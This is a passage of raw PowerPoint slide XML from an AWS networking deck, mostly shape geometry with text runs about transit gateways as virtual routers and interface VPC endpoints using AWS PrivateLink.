                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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831085" y="5833109"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="12455271" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124552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831085" y="5833109"/>
              <a:ext cx="12544425" cy="1080770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1080770">
                  <a:moveTo>
                    <a:pt x="0" y="88772"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6977" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="6977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="26003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="54221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="88772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12537066" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518040" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12489822" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12455271" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88772" y="1080515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54221" y="1073538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26003" y="1054512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6977" y="1026294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="991742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88772"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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2026666" y="6176848"/>
            <a:ext cx="1044003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Virtual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router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means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managing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interconnections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between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different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subnets.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26666" y="5398135"/>
            <a:ext cx="220535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70">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Trans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gat</a:t>
            </a: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ways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95876" y="1780793"/>
            <a:ext cx="769747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VPCs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transit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gateways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function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based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following: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37182" y="3772661"/>
            <a:ext cx="6162040" cy="4543425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6162040" h="4543425">
                <a:moveTo>
                  <a:pt x="0" y="757174"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1489" y="709285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5898" y="662188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13139" y="615972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23122" y="570726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35759" y="526537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50962" y="483495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68641" y="441689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88707" y="401207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111073" y="362137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135650" y="324568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162349" y="288590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191081" y="254290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221757" y="221757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254290" y="191081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288590" y="162349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324568" y="135650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362137" y="111073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401207" y="88707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441689" y="68641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483495" y="50962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526537" y="35759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570726" y="23122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615972" y="13139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662188" y="5898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709285" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757174" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5404358" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5452246" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5499343" y="5898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5545559" y="13139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5590805" y="23122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634994" y="35759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5678036" y="50962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5719842" y="68641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5760324" y="88707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799394" y="111073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5836963" y="135650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5872941" y="162349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5907241" y="191081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939774" y="221757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5970450" y="254290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5999182" y="288590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6025881" y="324568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6050458" y="362137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072824" y="401207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092890" y="441689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6110569" y="483495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6125772" y="526537"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6138409" y="570726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148392" y="615972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6155633" y="662188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160042" y="709285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="757174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6161532" y="3785870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160042" y="3833754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6155633" y="3880847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6148392" y="3927060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6138409" y="3972305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6125772" y="4016491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6110569" y="4059532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6092890" y="4101338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6072824" y="4141820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6050458" y="4180889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6025881" y="4218458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5999182" y="4254437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5970450" y="4288738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5939774" y="4321271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5907241" y="4351949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5872941" y="4380682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5836963" y="4407382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5799394" y="4431961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5760324" y="4454328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5719842" y="4474396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5678036" y="4492077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5634994" y="4507280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5590805" y="4519919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5545559" y="4529903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5499343" y="4537144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5452246" y="4541554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5404358" y="4543044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="757174" y="4543044"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709285" y="4541554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="662188" y="4537144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615972" y="4529903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="570726" y="4519919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="526537" y="4507280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483495" y="4492077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="441689" y="4474396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="401207" y="4454328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362137" y="4431961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="324568" y="4407382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288590" y="4380682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254290" y="4351949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221757" y="4321271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191081" y="4288738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162349" y="4254437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135650" y="4218458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111073" y="4180889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88707" y="4141820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68641" y="4101338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50962" y="4059532"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35759" y="4016491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23122" y="3972305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13139" y="3927060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5898" y="3880847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1489" y="3833754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3785870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="757174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187320" y="4605883"/>
            <a:ext cx="5370195" cy="31534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23825">
              <a:lnSpc>
                <a:spcPct val="113999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4914265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>endpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>AWS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>PrivateLink	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-6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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>private</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>such </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-61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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>as</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="487680" indent="-343535">
              <a:lnSpc>
                <a:spcPts val="2740"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="1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000" spc="2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000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rvic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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dirty="0" sz="20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0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5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000" spc="-3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000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>au</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25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000" spc="-4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0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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Amazon</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-2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000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rvice  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35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dirty="0" sz="2000" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45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000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ished</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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1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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ame</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="190"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5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dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25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000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>poi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55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000" spc="-4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0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8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000" spc="-25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000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ter</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ad</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-1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000" spc="-15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0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000" spc="-4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0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1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000" spc="-4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000" spc="-25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dirty="0" sz="2000" spc="-15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endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-3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000" spc="-2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000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rvic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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000" spc="-14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75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dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ons</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="200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000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VPC</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Instanc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-6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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-6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000" spc="-25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dirty="0" sz="2000" spc="-45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dirty="0" sz="2000" spc="-15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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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0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75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dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ons</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-4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dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="200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000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>VP</a:t>
            </a:r>
            <a:r>
